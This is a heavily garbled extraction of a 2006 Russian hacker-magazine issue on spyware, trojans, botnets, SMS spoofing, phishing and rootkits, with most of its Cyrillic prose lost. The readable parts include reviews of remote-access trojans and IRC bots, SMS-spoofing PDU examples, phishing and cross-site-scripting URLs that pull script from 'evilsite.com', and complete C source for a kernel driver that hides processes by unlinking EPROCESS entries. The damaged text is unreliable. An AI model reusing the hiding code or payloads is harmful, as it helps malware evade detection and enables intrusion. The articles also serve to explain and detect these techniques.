Вы находитесь на странице: 1из 117

09 70 2006

SPYWARE
34
40
52

, .
( ,

SYNC

:)

w w w.t o t a l f o o t b a l l . r u

-2006:
5 2006

37

Maxi Tuning

Total DVD

DVD

Total Football

Onboard

Mountain Bike
Action

8-495-780-88-29 ( )
8-800-200-3-999 ( )

9 18

intro
!

.


,

. ,
.
,
.
, , .

BHO.
! , .

. ! ,
.
-
, ?
?
,
,
! ?
! ,
.NET .

09|70|2006
WWW.XAKEP.RU

.
.
,
, .
.


AvaLANche (avalanche@real.xakep.ru)

Dr.Klouniz (alexander@real.xakep.ru)
(andrusha@real.xakep.ru)
CD/OFFTOPIC
SkyWriter (sky@real.xakep.ru)


-
(vasin@real.xakep.ru)

(zhukova@real.xakep.ru)

12

18

24

28

30

34

40

46

52

56

O

(igor@gameland.ru)

(olga@gameland.ru)

E (olgaeml@gameland.ru)
(goryacheva@gameland.ru)
(alekhina@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24


(vladimir@gameland.ru)

(andrey@gameland.ru)

(popov@gameland.ru)

(kosheleva@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24



(nahalova@gameland.ru)
.: (495) 935.70.34 (. 454)


sms


spyware

spyware bho

60

68

72

76

80

82

84

88



(dmitri@gameland.ru)

(shostak@gameland.ru)

(romanovski@gameland.ru)

(stepanovm@gameland.ru)

(dianova@gameland.ru)

(boris@gameland.ru)

(sidorovsky@gameland.ru)

.: 8 (800) 200-3-999

101000, , , / 652,
spec@real.xakep.ru
ScanWeb,

,

77-12014 4 2002 .
42 000 .
.


anti-spi.info

spyware

SPECIAL DELIVERY
SPECIAL

SPECIAL

SPECIAL

SPECIAL FAQ

AVZ
(
)

offtopic

88

82

80

82

HARD
LCD 20+

- 20

, !
Zyxel P-660RU E

SOFT
NONAME

nnm.ru

. 2

86

88

95

CREW
E-

STORY

09(70) 2006

MULTIBOOTABLE

NoNaMe
:
Norton Internet Security 2006
Kaspersky Anti-Virus 6.0
Widestep Elite Keylogger v3.0

cd :

Windows
(9x/XP/NT/2000/2003)
07(68),

.
.
: ,
!
.
.

Actual Spy 2.8


BO2K 1.1.3 (core)
Blowfish BO2K
Ricq BO2K
Mobile Access Control 4.0 Pro
Remote Administrator 2.2
TightVNC 1.3dev7
Sub7 2.1.5
Family Key Logger v2.83
Personal Desktop Spy v2.10
Golden Keylogger v1.32
Give Me Too v2.46
Personal Inspector v5.00
SpyArsenal Print Monitor Pro
Quick Keylogger v2.1
Handy Keylogger v3.25.032
Widestep Elite Keylogger v3.0

Anti-Spy.Info 1.6
Advanced Anti Keylogger v3.7 (Lite)
Anti-keylogger v7.3
PrivacyKeyboard v7.3
Trend Micro Anti-Spyware 3.0
DrWeb 4.33
Ad-Aware SE Pro
Kaspersky AntiVirus Symbian (Nokia)
Microsoft Windows Defender Beta
Norton AntiVirus 2007 Beta
Norton Internet Security 2006
Kaspersky Anti-Virus 6.0
Kaspersky Internet Security 6.0
AVZ 4.19
Agnitum Outpost Firewall Pro 3.51
ZoneLabs ZoneAlarm 6.5.731 (Free/Pro)
ZoneLabs Internet Security Suite

IceExt 0.70
COBA PC
PE Tools v1.5.400.2003 Xmas Edition
TheBat! Pro v3.80 (+help)
SDTrestore v0.2
Wasm.Ru
icedump 6.026 & nticedump 1.14
Process Explorer v10.2
GetDataBack NTFS

NONAME
Chat Watch v4.4.5
HDD Regenerator v1.51
McFunSoft Video Convert Master 6.3
Online Armor v1.1.1.826
Sunbelt Network Security
Inspector v1.6.57.0
Keyboard Maniac 4.2
NeuroSolutions v5.03 Developer Edition
Amor SWF to Video Converter 2.3.8
Secure iNet Factoy v5.8 for Java
php2exe
Fresh Diagnose v7.38
AVG Free Edition 7.1.405
PIMone Ver 5.1 Build:2006.7.4.145

, ?
TOTAL DVD!
,
,

DVD , 50 ,

... !
, !

Total DVD !
DVD-
(
),
DVD-.

?
DVD - !
Hi-Fi, High End Home Cinema!



.
50
, ,
!

DVD !
, , , !
DVD-
(
)
.

timeline

andrusha@real.xakep.ru

1986

1994

, .

.


,
.

OneHalf . MBR , INT 13h, 1Ch, 21h COM- EXE- . ,



.
.
,
..
, :
Disk is one half. Press any key to continue ...

1995
Word.Concept,
6- Worde Windows 3.1.
Windows 95 DOS-, ,
Microsoft
.

. , -

. ,
. ,
Visual Basic for Application (VBA).
Windows- ,
.

1998
Win32.CIH ,
26 ,
.
1 , . Windows
95/98 :
, ,
Flash BIOS
. , , - ,
.
,

CD
, .

1999

2000

Back Orifice () Cult of the Dead Cow


.

. ,

.
.
,
, .
- 125 . Back
Orifice , . windows\system\ .
, , , BO2k SDK.


.


ILOVEYOU.
VBS- ( ).
,
.
, .
, .
, .
,

.

2004
,
E-mail fraud. ,
.
,


, , ,
,

2006
.
, ( ).

. , ,
.

20
. , 20 ,
99% .
.
Windows
- , , .

8 / 33

18

28

12

24

30



,
, .
! . ,
.

alukatsk@cisco.com
, , .
. , RFID-
,
RFID-.
, -
, .
,
?
, ,
, .

, -

.
, , ,
, , - .
,

, ,
(Wi-Fi, WiMAX, RFID ..), IP- ..

.
,

10 09- 06

,
. ,
,
. ,
, ,
.
SOAP, XML .. , . , -,
,
...
c
, ,
,
. ,
. , .
, , , , PowerPoint, Acrobat Reader,
..
. ,
, -

,
.
, 1000 15 ( - 150000-250000 ).
75 ,
6 .
, , .
.
,
6 .
,

.

.
. ,
, ,
15 .
24


, ,
. , ,
.

, .
C : , ,

: -

( ), -

, -

, -

, -

, ,

spyware. ,
( ).
,
spyware ( ). ,
spyware.
, Instant Messaging
(, ICQ Mirabilis), P2P (, Kazaa eDonkey), web- .. ,
spyware.

. , , .
:
(, , ) . , ,

,

.
,

: , -

,
, ( ), ,
.

,
. , ,
, . ,

:
(
), ( ), , - (********),
..
,
(, ,
, ..):
. , .

(www.freescan.ru).
, -, e-mail. , . ,
.


, .
, , ,
, , . 2005 ,
(www.ifap.ru/as/050524d1.pdf).
. , ,
,


.
?
, . . ,
, ,

11

. ,
. , . .

? .
, , : , ..
, , Cisco Service Control Engine. , ,
, .
, , , ,
. , , , . ,
Mirapoint Radicati Group, 11% , . ,
. , .
DNS .
, spyware- , , DNS.
- , DNS, IP-.
, , , . , ,
, , .
,

( ),
.
( , ) ,
.
:
, ,

.

. DoS-,
,
DoS- .
,
, , . -

- ,
.
,

,
, IRC- ..
:
,
, .

.
, .

, , ,
..
. , .
, ,
.

, , .
- , , iPod,
.
,
.

IP- ( SIP
H.323), RFID, SOA, XML, SOAP . , , ,
.
,
.
. , .
(, IPS, , ..). ,
( ,
..) ,
, . ? ,
. 30-50 ,
. ,

.
,

. ,
(
) 15 !
4 ,
.

,
, ,
.
5- ,

.
, . ,
, , (-

14400 , 7-
ADSL-).
- . , 2-3 (
).



. , , . , , .
, , ,

www.ifap.ru/as/050524d1.pdf


www.kaspersky.ru/removaltools

,
www.spamcop.net
-
,

www.antispam.ru
...
: , ,

12 09- 06



,
.

.

. ,
.
, ,
. ,
,

aka razy_script
crazy_script@vr-online.ru

. ?
: , , ,
, . SpyWare
:
, , ,
.


, .
,
,
.

13

GORL


,
.
? ,
, , , ...



. ,
,

( , ,
). -


. , , ,




. TAN'
.
,
-,

http-
, ,
TAN',
.
.
-

. ?
,
,
Outlook
-
The Bat! 3.5.


,
( ) .

, -

, ,
, , , , .
?
!


.
.
, ,
40
.

- .


-

, , , , ,
.

, .

?
?

, . -

,
,
- ,



. , . -

? ,
? , - ?

. ( )

(
, ).


.
, 23 -

,
(
, ,
, ),
$50 .

14 09- 06

3/5
Midday
Sausages 1.0
rootkit
free
http://rst.void.ru


.
RusH Security Team
, ,

.
30 ,
unix-.


(midday_sausages.txt).

IKS (Invisible Keylogger
Stealth).

.

iks.reg,

. :
DisplayName ( , ),
LogName (
).


-.
.
readme (
)
.



enum Razor.

:
,



- .
-D -u <login>
-f <file_passwd>
.

nete
Cult Death Cow.
.
-, , , .

8 ( 2.7 ).
-, . attrib
+h. ,
, .


: rst.void.ru.

4/5
CIA 1.3
rat
freeware
www.cruel-intentionz.com


,
VB
Alchemist. , ,
,
, :).
mew by Northfox (northfox.uw.hu)

. open source
LZMA (
7-Zip).
(ASPack, PECom2,
UPX),
.


mew
PeiD MEW
www.team-x.ru.

- ,


,

.

(Build Server 
Binder). ,


.
CIA . -


(
socks)

.

:). -,
,

VB.

, ,
. , . 100
, 5

.
, ,
,

.
CIA ...
,

(
2 )

PE. ,
.
.
, ?
.
(
) (Build
Server  Firewall Killing).

-
500 .

4/5
Penumbra 1.7.2
trojan
freeware
www.yzkzero.yeah.net

4/5
KGB KeySpy 2.0
keylogger
freeware
www.ya.ru :)




. ,

Windows
Task Manager: Process
Explorer
.


.

,
, , :

370Kb.

,


:
, , ,
,
explorer'a
winrar'.

, ,
CIA,
.

,

. (

),

.

Blacklogic.


. 2005

.
,
, ,
,
. , 2
.

-

: smtp-, , .
9- .
,
-
,

, '
.
,
(unpack*.exe).

16 09- 06

5/5
Illusion
Security Bot
backdoor
private ($400)
www.illusion.cup.su




irc, web.


,
.

:
, , ,
.

, ,
. .



,

(, ),
.

.
,

. -

,
(
!), , . ,
: SYN,
ICMP ( IP, ),
UDP, HTTP GET ,
!
,
irc
.


!login [passwd].

md5crypt.

.
,
nick!ident@address irc
. ,

, ..
ident address .
,
.
:
, ,
.
,
- .

3/5
Pinch 2 Pro
trojan
shareware
www.pinch3.ru
www.xroot.hut1.ru


coban2k, ICQ, , ,

(XS11(48)). , .

? -,
,
,

2.58.
2.95 . -, ,
, .

: ,
Far'
TotalCmd. ,
smtp- http.
:


smtp,
firewall. , . ,
,
www.xakep.ru/post/23566/.

IRC.
.
.

fall back! , , . , , ,
.

www3.ca.com/securityadvisor/pest
Spyware
www.research.sunbelt-s
software.com

www.simovits.com/trojans
-
CD
Illusion Security Bot

.

.

ENGINE
w

.m

start
axi-tuni

ng

18 09- 06

SMS
PEPSI-COLA NEXT
SMS.
,
, SMS-


alukatsk@cisco.com
, .
, ,
. SMS .
SMS. 3 :
.
(E-MAIL, WEB, SKYPE ..).
ESME
(EXTERNAL SHORT MESSAGE ENTITY)
SMS-,



,
(,
)

.

,
SMS (SMS Centre, SMSC),
(
,
).
,
SMS-
. ,
,
HLR (Home Location Register).

, .
(Mobile Switching Center, MSC), . SMS- MSC
, VLR (Visitor Location Register) -

HLR, () . , MSC (base station,


BS), , , .
, .
, , .
. ,
SMS , ?

,
. , . IS-41 (ANSI-41)
, ANSI-136
AMPS IS-95 CDMA. GSM-
MAP (Mobile Application
Part).
. MAP,
, 7 (SS7),
, SMS.
TCAP (Transaction Capabilities Application Part), , ,
SCCP MTP. Signaling Connection and Control Part (SCCP)
SMS . ( , ) . MTP , .

SMS-
3 1992
VODAFONE

19

20 09- 06

ESME SMSC
IP, SMS 7.
IP- 7 Signaling Transfer Point (STP),
, IP-.
SMSC 5- :
SMPP (SHORT MESSAGE PEER-TO-PEER)


.
5.0,
3.4
( 4
).
EMI/UCP (EXTERNAL MACHINE
INTERFACE/UNIVERSAL COMPUTER
PROTOCOL)
LOGICACMG, ETSI UCP.
CIMD2 (COMPUTER INTERFACE
TO MESSAGE DISTRIBUTION)
NOKIA.
OIS (OPEN INTERFACE SPECIFICATION)
SEMA GROUP
( SCHLUMBERGERSEMA).
TAP (TELOCATOR ALPHANUMERIC
PROTOCOL) ,
SMS-
.

SMSC ,

. SMSC Comverse, Nokia,
Unisys, Airwide, Jinny, Motorola .
, , LogicaCMG ( Logica CMG).
SMS. , SMS
,
. , (ringtone)
/.
160 ( 7- ). , , 70 . , . 8- , 140 .
. , , TFTP, -

.
.
Over-the-air programming (OTA), over-the-air service
provisioning (OTASP) over-the-air parameter administration (OTAPA).
, .
( SMS)

.
. :

ESME;
SMS-;
SMS-DOS;
SMS-.

ESME. SMS
SMSC , :
1

WEB-SMS.

2
SMSC
(, SMPP).

- ESME ,

( ESME, ..).
web, ,
SMS.
, ( ). 2 SMS
, .
( SMPP-) SMSC - ,
System-ID, System-Password, System-Type -.
, . SMS- -, . , - , .

. ,
.
. ,
VIP-, .
:
WEB-

APPLICATION FIREWALL,

,
WEB-.

IP- ESME.

SMSC-ESME
.

SMSC ESME.

-.


.
,
,
ESME
.
, ..


,

SLA

.

SMS-
. SMS-
. , . , ( SMS ) .
? .
, 100000 SMS-
10350 . 103500 .
.
,
:

21

15 ;
2
;
5%

;


7 .

... 63
!
, , .. 4 SMS-:
SPAMMING

. ,





,

.
?. ,
,

,

SMS.

.
(, MOTOROLA)
AUTOREAD,


.
,
, , SMS
,
.
FLOODING
SMS-

.


,
SMS -
,
.
FAKING SMS
SMS-.
-


.
SPOOFING
SMS-,


,
,
.

SMS-? . -,
web-. -, SMSC
, ,
SMPP.
SMPP ,
PDU (protocol data units).
PDU :
'service_type', () ... 00
'source_addr_ton', (2) ... 02
'source_addr_npi', (8) ... 08
'source_addr', (555) ... 35 35 35 00
'dest_addr_ton', (1) ... 01
'dest_addr_npi', (1) ... 01
'dest_addr', (555555555)
... 35 35 35 35 35 35 35 35 35 00
'esm_class', (0) ... 00
'protocol_id', (0) ... 00
'priority_flag', (0) ... 00
'schedule_delivery_time', () ... 00
'validity_period', () ... 00
'registered_delivery', (0) ... 00
'replace_if_present_flag', (0) ... 00
'data_coding', (0) ... 00
'sm_default_msg_id', (0) ... 00
'sm_length', (5) ... 0F
'short_message', (Hello) ... 48 65 6C 6C 6F'

source_addr
. SMSC , . , 7, , , 7. , - .
, (,
SMPP , ,
Delphi), . Google
SMS Spoof Palm OS (

EMI/UCP) www.smsspoofing.com, -


SMS (
PayPal, 170 ).
:
,
, .

.
SMSC
STP

/

( ESME, MAP/SCCP-).

,
, .
, SLIMIT-C
NEC

,

,
.
URL .

SMS-.

NTT DOCOMO,


100
.

.
BELL CANADA


SMPP- ESME.
, ,
ESME-

SMS ,

40-50 SMS .
,

DOS-,

,
.

(
SMPP)
SMS-, . , (-

22 09- 06

, ), SMS
SMSC, MSC ,
SMSC, . 7.
.
7.
STP (,
Cisco ITP) . LogicaCMG, Openmind Networks, eServ Global Ferma SAS (SMS Anti-Spam Screening).
SAS
SMS , , .
:

;
;
IMSI ;

;
;
/ .

DoS. , ,
SMS DoS'
, SMSC.
,
Exploiting Open Functionality in SMS-Capable Cellular Networks
. - , , - ,
,
( ).
:
SMSC. ,
SMSC , SMSC .
, . Ping
of Death ( ICMP,

IP- 64 ),
SMSC . SMS-,
SMSC, .
,
SMS' , SMSC .
, SMS
,

SMS- . ,
hello 66677789
EMI/UCP : ^B01/00045/O/30/66677789///1//////68656C6C6F/CE^C.
(00045) .
SMSC , . ,
(O
, R )
(, 30 ).
SMSC.

, . ,
Nokia, . DoS- , , 25
44- 13- .
, .
SMS-

SMSC, , .
.
SMS-
DoS- SMSC. ,
IP-, .
DoS DDoS-, .
, , OTA,
. SMSC, (,
SMSC).
, -
, .
SMS-
. SMS- , , .
, SMS-
.
,
SMS
. Cabir, -

Bluetooth, Symbian. Duts, Brador...



( , Symbian, Windows CE/Mobile). .
Comwarrior,
Bluetooth, MMS,
, . -, , SMS SMS-
( ,
OTA-), .
Symbian
MMS, SMS
, .
SMS , DoS ..
, .
SMS ESME 7 . , 7, . SMS .
, SMS-
( )
( ).
,
.

.
, ,
,
.
,
, .
SMS-
SMS-,
. ,
, IP-
(
IP-). , , , .

Yes SMS-. ?
www.smsspoofing.com
sms 170

24 09- 06


SPYWARE
SPYWARE ,
,

, ,

alukatsk@cisco.com
Spyware .
Webroot, 9 10 , , , 86% . Gartner, 20%
40% (
)
spyware.
spyware, Microsoft, .. . , -


, , , Sony Extented Copy Protection.

SPYWARE . , , 1

25

26 09- 06

.


,

?

.



.
SPYWARE
-
.
FREEWARE SHAREWARE
,


,


SPYWARE.
, :
DIVX, FLASHGET, EDONKEY 2000, ICQ
..


. ,
, SPYWARE

.





,
POPUP' ..
SPYWARE



.


,

,
.

SPYWARE,
SHAREWARE/FREEWARE
,
.
2


WEB-,


3

.

INTERNET EXPLORER,


WINDOWS
.

,

.
4
. ,
SPYWARE


?

?.
( ) .

, BROWSER HELPER
OBJECTS (BHO). DLL-,
1997
INTERNET EXPLORER

.
BHO
,
PDF',
ACROBAT READER,

YANDEX.TOOLBAR GOOGLE.
DESKTOP ..


. ,

DOWNLOAD.JECT

HTTPS ,

(
)

.

BROWSER HELPER OBJECTS
.

.

. ,
spyware Dialer DUN (DialUp Networking) ,
,
. ,
,


. Dialer , .
web-,
.
,
, .
( adware)
( , URL),
. ,
pornware. Annoyware
adware,
. -.
adware , ,
,
. ,
,
.
, adware . . , adware ( )
,

Internet Explorer.
(, CoolWebSearch
Download.ject) , , PIN, ..
keylogger ,
. (,

)
, ,
PIN-, .
, Hijacker, ,
(home page), , HOSTS, . , In-

27

ternet Optimizer ( DyFuCa)


.
, stealware ( click fraud, affiliate fraud).
spyware (, 180 Solutions). ,
. , ,
spyware ( CoolWebSearch HuntBar) , ,
..
. , spyware.
. -

spyWware. ,

(RealSecure Desktop). -

spyware

( ,
). , , - ( , , ),
.

.
spyware ( ), (
). Targetsoft
Winsock (inetadpt.dll),

. , ,
. spyware

.
,
. , W32.Spybot
spyware.
. (spyware)
, .
(, ) spyware . .
, , , . 70% , . , . spyware
,
http://msdn.microsoft.com/library/default.asp?url=
/library/en-u
us/dnwebgen/html/bho.asp
BHO

28 09- 06

,

MICROSOFT WINDOWS ( )
noname

, , ,
, , - . , -
:
.


, c.
: 40% - .
Caterpillar, CNN, eBay Microsoft. - . () - 2005 538%.
, - .
,
,
. - . -
-.
-

. - .
- . 250000 , .
, - 7% , 47 681
. McAfee,
2005 28 -
, 2004 . 197 ,
-...
. .
1 . -, , ,

.
-

. .
2 .
.
,
. , , P2P- .
3 .
. , , , ,
.

,
.
, ,

29

.
IP- , .
, CodeRed, Mydoom
Sql Slammer . - . -20 , , 30%

- (MYTOB, BKDR_IRCBOT,
PERL_SHELLBOT ).
. - IRC- P2P.
- IRC (Internet
Relay Chat). -,
- . IRC-
, IRC-, , .
- . IRC- IRC- .

IRC- 6667 (
,
IRC),
, .
IRC , ,
, .
-
.
IRC.

-
DDoS
,
100$ DDoS-,
- 10000
(www.spamdailynews.com/publish/Organized_crime_offers_rent-a-zombie_deals.asp).
,

FTC (
),
4800$

250000 ,

( , #TESTING). ,

-.
,
,
.
-
.
. -
. -
30, 50 . -
(Phatbot), 400 (!) .
-?
- 1000 128 /, ,
100 /.
-
.
50000 50
/ 300 /.
, -

, 445
135 tcp-. ,
-.
- ,
( ). -

500$
(www.ftc.gov/opa/2003/09/idtheft.htm).

, . , ,
. , , (, ). .
-
- 100 200$ (

- .
1 DDoS-.
, -.
ICMP SYN- ,
http ftp- . ,
DDoS-,
: , , .. DDoS-
: - .
2 SMTP relay.
SOCKS proxy ,
- ( ).
. , -,
,
.
3 . - , , (clear-text data)
. ,

. ,
. ,
, .

150000 ). IP-,
,
.

- dial-up
.
DDoS, , , .

- ,

.


$150 1000 . 1000
html- ( ). ,


.

30 09- 06

, , ,
,
.
, 95%
-
NONAME


, ,
,
,
, .
-
, .. , , , ,
, , ,
.

,
. E ,
-, n-
- , , , 2

. , IRC, - -.
.
. ,

.
,
.
,

, DNS-.
.
-, -

? , :
.

, 48
.
,
.

, , , - . - -

31


, ..
. ,
-
, , .
:
. ,
,

(
).

.

.



.

: DNSChanger.eg.
-.
, , jpmorgan.com, ,
IP-, ,
192.220.34.11. ,

IP-. URL, web-.

.
IRC -
. IRC - (IM)

.
IRC IM-
(, URL- ..), ,
- .
. ,

, .
.
.
,
, . :

.
URL.
CROSS-SITE SCRIPTING.

.
.
1 . ,

-, . -, . http,
https-. - , .
HTTPS ( SSL) ,
, ,
, SSL- .

, :

.
,

.
DNS-.
DNS
,

IP-
.
URL. URL,

. ,
WHITEHOUSE.GOV .COM
.

( MICRO, MICO, MICOR...).
.
.

PAC-
WPAD (WEB PROXY
AUTODISCOVERY PROTOCOL).


-.

2 URL. , , ,
.
.
-
:

HTTP://PRIVATEBANKING.MYBANK.COM.CH
HTTP://MYBANK.PRIVATEBANKING.COM
HTTP://PRIVATEBANKING.MYBONK.COM
HTTP://PRIVATEBANKING.
MYBANK.HACKPROOF.COM

3 ross-site scripting. cross-site scripting


(CSS) -. , .
CSS :

HTML (
): HTTP://MYBANK.COM/EBANKING?URL=HTTP://EVILSITE.COM/PHISHING/FAKEPAGE.HTM.
URL: HTTP://MYBANK.COM/EBANKING?PAGE=1&CLIENT=<SCRIPT>EVILCODE...
: HTTP://MYBANK.COM/EBANKING?PAGE=1&RESPONSE=EVILSITE.COM%21EVILCODE.JS&GO=2.

,
.
-
- .
4 . http- .
-, ,
cookies,
, URL.
- .
, - ,
. ,
,
, -

32 09- 06

(, 404 File Not Found, 302 Server Redirect


..). ,
,
() .
.
5 .

. dhtml- DIV.
( ) .
6 Screen grabbing.
-.
key-logging .
7
. . ,
From .
, - :
<a href= http://fakesite.com>https://genuinesite.com</a>.
https://genuinesite.com, , , http://fakesite.com.

Internet Explorer. .

-


EBAY, PAYPAL CITIBANK.
. , SPEAR PHISHING,
: - ,
.. , : , ..
.

, , http://www.genuinesite.com%01%00@fakesite.com/,
:
http://www.genuinesite.com. . , %01 %00.
8 . - , ,
, .
, , ,
. ,

, .

- , , , , , .
9 .
https.
(Internet Explorer).
1 0 . , .
. ,
www.paypal.com www.paypal.com www.verify-paypal.com.
, .
1 1 . ,
,
, .
, ,
. , .
1 2 .

, ,

- , spyware
. ,
,
,
.

URL-

? ,
, . -,
, , . ,
SSL (https://).
, , , . -

,
-
.
,
.
,
,
, .
, ,
-, . ,
,
, IP . , -. , Internet Exporer 7 Mozilla Firefox 2 ,


EBAY, PAYPAL
CITIBANK

!
GamePost

Final Fantasy XI:


The Vana'diel
Collection
(US Version)

Lineage II
Collector's DVD
Edition (US)

Elder Scrolls IV
Oblivion Collector's
Edition

$69.99

$99.99

$99.99

Diablo Action
Figure:

Necromancer

$42.99

* * *

34 / 59
34

40

52

46

56

,


. -
. ,
,

http://www.z-oleg.com/secur/
.
, . , , :
.
MS DOS

. ,

- ( .
Stealth ). ,
: (
) ? :
. MS
DOS API-
, :
1 ,
.
2 .
, , .
.

user-M
Mode . UserMode
, , .
, Win9x NT, . (
). , UserMode :
,

.
,


.
.

API-.

35

36 09- 06

DLL

, API

Rootkit
Kernel32.dll
LoadLibrary
GetProcAddress

DLL

, API

Rootkit
Kernel32.dll
LoadLibrary
GetProcAddress

, API

,

.
, API- . , , ,
. ,
.

, . ,
.

. , PE
, . ,
,
.
.
.


.
LoadLibrary GetProcAddress
kernel32.dll , .
UserMode- , . , , , ,
-.
,

. ,
,
- (
, ..). .
, API-
. : .
JMP .

:
1 .
,

( , )
. 5 , EB
xx xx xx xx JMP.
, ,
. ,
.
2 . , . ,
, . JMP
API-, PAGE_EXECUTE_READWRITE, . API-
,
, , , .
, .
, . -

37

Kernel32.dll

ntdll.dll

INT2Eh

STD
ntoskrnl.exe

hal.dll

bootvid.dll

Kernel-mode


.
3 . , . ,
. , .
kernel-M
Mode
( 5-10 UserMode
KernelMode),
. .
, :
1 KiST. , KiST
. KiST SDT,
, .

Windows
2000.
2 .
UserMode.
3 INT 2E sysenter.

, .
4 -.
IRP
.
( Ring0) KernelMode UserMode .
DKOM, . DKOM- (DKOM
Direct Kernel Object Manipulation)
, . ,
,
.
DKOM- FU-
.

. ,
EPROCESS.
Flink BLink,
, .
EPROCESS Windows,
, - .
: WinDBG.

NTSTATUS DriverEntry(IN PDRIVER_OBJECT
pDriverObject, IN PUNICODE_STRING
pusRegistryPath)
{
// BuildNumber
switch (*NtBuildNumber) {
case 2195: // Win 2k
ActiveProcessLinkOffset = 0xA0;
PIDOffset
= 0x09C;
break;
case 2600: // Win XP
ActiveProcessLinkOffset = 0x88;
PIDOffset
= 0x084;
break;
case 3790: // W2K3
ActiveProcessLinkOffset = 0x98;
PIDOffset
= 0x094;
break;
default:
return STATUS_NOT_IMPLEMENTED;
}
PDEVICE_OBJECT
DeviceObject =
NULL;
NTSTATUS
ntStatus;

UNICODE_STRING
codeString;
UNICODE_STRING
UnicodeString;

usDeviceNameUniusDeviceLink-

// Unicode-
RtlInitUnicodeString
(&usDeviceNameUnicodeString,
L"\\Device\\DKOM_Demo");
RtlInitUnicodeString (&usDeviceLinkUnicodeString,
L"\\DosDevices\\DKOM_DemoLink" );
//
ntStatus = IoCreateDevice
(pDriverObject,
sizeof(DEVICE_OBJECT),
&usDeviceNameUnicodeString,
FILE_DEVICE_UNKNOWN,
0,
TRUE,
&DeviceObject);
//

if (!NT_SUCCESS(ntStatus)) {
return STATUS_UNSUCCESSFUL;
}
//
ntStatus = IoCreateSymbolicLink
(&usDeviceLinkUnicodeString,
&usDeviceNameUnicodeString );
if (!NT_SUCCESS(ntStatus)) {
IoDeleteDevice(DeviceObject);
return STATUS_UNSUCCESSFUL;
}
//
CREATE/CLOSE/CLEANUP
pDriverObject->MajorFunction
[IRP_MJ_CLEANUP] =
pDriverObject->MajorFunction
[IRP_MJ_CREATE] =
pDriverObject->MajorFunction
[IRP_MJ_CLOSE] =
DispatchCreateCloseControl;
// ,

pDriverObject->DriverUnload =
DriverUnload;
//

return STATUS_SUCCESS;
}
, : ActiveProcessLinkOffset PIDOffset. ActiveProcessLinkOffset
EPROCESS / , PIDOffset -

38 09- 06

, PID .
, ,
,
.
.

. . ,
, IRP_MJ_CREATE,
IRP_MJ_CLOSE, IRP_MJ_CLEANUP , .

IRP_MJ_DEVICE_CONTROL .
,

IRP ,
PID.
: ,
.
:
/
/
NTSTATUS DispatchCreateCloseControl
(PDEVICE_OBJECT pDeviceObject,
PIRP pIrp)
{
PIO_STACK_LOCATION pisl;
// IRP-
pisl = IoGetCurrentIrpStackLocation
(pIrp);
//
if (pisl->MajorFunction == IRP_MJ_CREATE)
HideProcessByPID((DWORD)
PsGetCurrentProcessId());
// IRP-
pIrp->IoStatus.Status = STATUS_SUCCESS;
pIrp->IoStatus.Information = 0;
IoCompleteRequest
(pIrp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
IRP_MJ_CREATE
PID
. :
VOID HideProcessByPID(int PID)
{
DbgPrint("Hide process. PID=%u", PID);
KIRQL OldIRQL =
KeRaiseIrqlToDpcLevel();
PEPROCESS CurrentProcess =
PsGetCurrentProcess();

if (!CurrentProcess) return;
PLIST_ENTRY CurrentProcessAPL =
(PLIST_ENTRY)((ULONG)
CurrentProcess +
ActiveProcessLinkOffset);
PLIST_ENTRY ProcessAPL =
CurrentProcessAPL;
ULONG ProcessPID;
do {
ProcessPID = *(PULONG)
((ULONG)ProcessAPL
ActiveProcessLinkOffset
+ PIDOffset);
DbgPrint("%u", ProcessPID);
if (ProcessPID == PID) {
ProcessAPL->Flink->Blink =
ProcessAPL->Blink;
ProcessAPL->Blink->Flink =
ProcessAPL->Flink;
DbgPrint("Process %u found and
hidden", ProcessPID);
break;
}
ProcessAPL = ProcessAPL -> Flink;
} while (ProcessAPL !=
CurrentProcessAPL);
KeLowerIrql(OldIRQL);
}

,

EPROCESS.
, PsGetCurrentProcess() EPROCESS .
EPROCESS
EPROCESS . EPROCESS- , Flink Blink . ,
: , , , , PsGetCurrentProcess().
:
VOID HideCurrentProcess()
{
KIRQL OldIRQL =
KeRaiseIrqlToDpcLevel();
PEPROCESS
CurrentProcess =
PsGetCurrentProcess();
if (!CurrentProcess) return;
PLIST_ENTRY ProcessAPL =
(PLIST_ENTRY)((ULONG)CurrentProcess +
ActiveProcessLinkOffset);

ProcessAPL->Flink->Blink =
ProcessAPL->Blink;
ProcessAPL->Blink->Flink =
ProcessAPL->Flink;
KeLowerIrql(OldIRQL);
}
: ?
!
:
1 .
PID

PID. , .
2 .
, , ,
,
csrss.exe- ,
.. ,
.
3 API. , -
. ,
-.
4 .
, BOOT,
.

Process Hunter ( Ms-Rem,
http://www.wasm.ru/pub/21/files/phunter.rar)
,
wasm.ru, DKOM-
FU Rootkit .
. , .
:
1 . .
2 -.

,
.

KiST . , .

39

4/5
AVZ
www.z-oleg.com/
secur/avz/
download.php
size: 1,55

AVZ ,
:
UserMode KernelMode.
, . -



KiST.
,
. :

-.

3/5
BlackLight
www.f-secure.com/
blacklight
size: 799

3/5
5/5
RootkitRevealer
www.sysinternals.com
size: 210

RootkitRevealer
www.sysinternals.com/. -

,

API.
, , RootkitRevealer . ,


, RootkitRevealer
. .

SSV
invisiblethings.org/
tools.html
size: 50

BlackLight

F-Secure
-.

http://www.f-secure.com/blacklight/, .




.


, .

SSV , Joanna Rutkowska, rootkit.com. http://invisiblethings.org,


50 , . SSV

.
.
:

,
AVZ
.

40 09- 06


,
, ,

,

z-oleg.com/secur

()

. MSDOS 1 . -

.

.
, ,
, .
,
,

, .
.
, ( ) .
1 .
: WH_KEYBOARD.
DLL,
GUI-
. ,
GUI-.

2 WH_JOURNALRECORD.
WH_KEYBOARD ,
, , ,
DLL. ,
.
3 . ,
. , .
4 -. , , -

41

77%
15%
8% -

78% rootkit-
13% rootkit UserMode
9% kernelMode kernel + UserMode
:
:

.
IoAttachDevice, \\Device\\KeyboardClass0. IRP IRP_MJ_READ

IoSetCompletionRoutine.
5 .
,
,
.
6 -.
UserMode, . UserMode csrss.exe


API- GetMessage PeekMessage. KernelMode
KeServiceDescriptorTableShadow
, PeekMessage. :
2-3 . ,
-
,
. UserMode
KernelMode ,
.

7 .
. ,
$50-100, .
, 65

, .
( ).
,
.
10% -.
- .
,
. ( ),
10%
, . ,
(
..).
, , ELITE Keylogger 2.6, - ( ) .
. .
:
1 .
,
. ,
http://www.keyghost.com/securekb.htm.
2 . . KEYKatcher Hardware Keyloggers (http://www.keykatcher.com/),
:
PS/2- USB-. KeyGhost
(http://www.keyghost.com/).
.

( ). ,
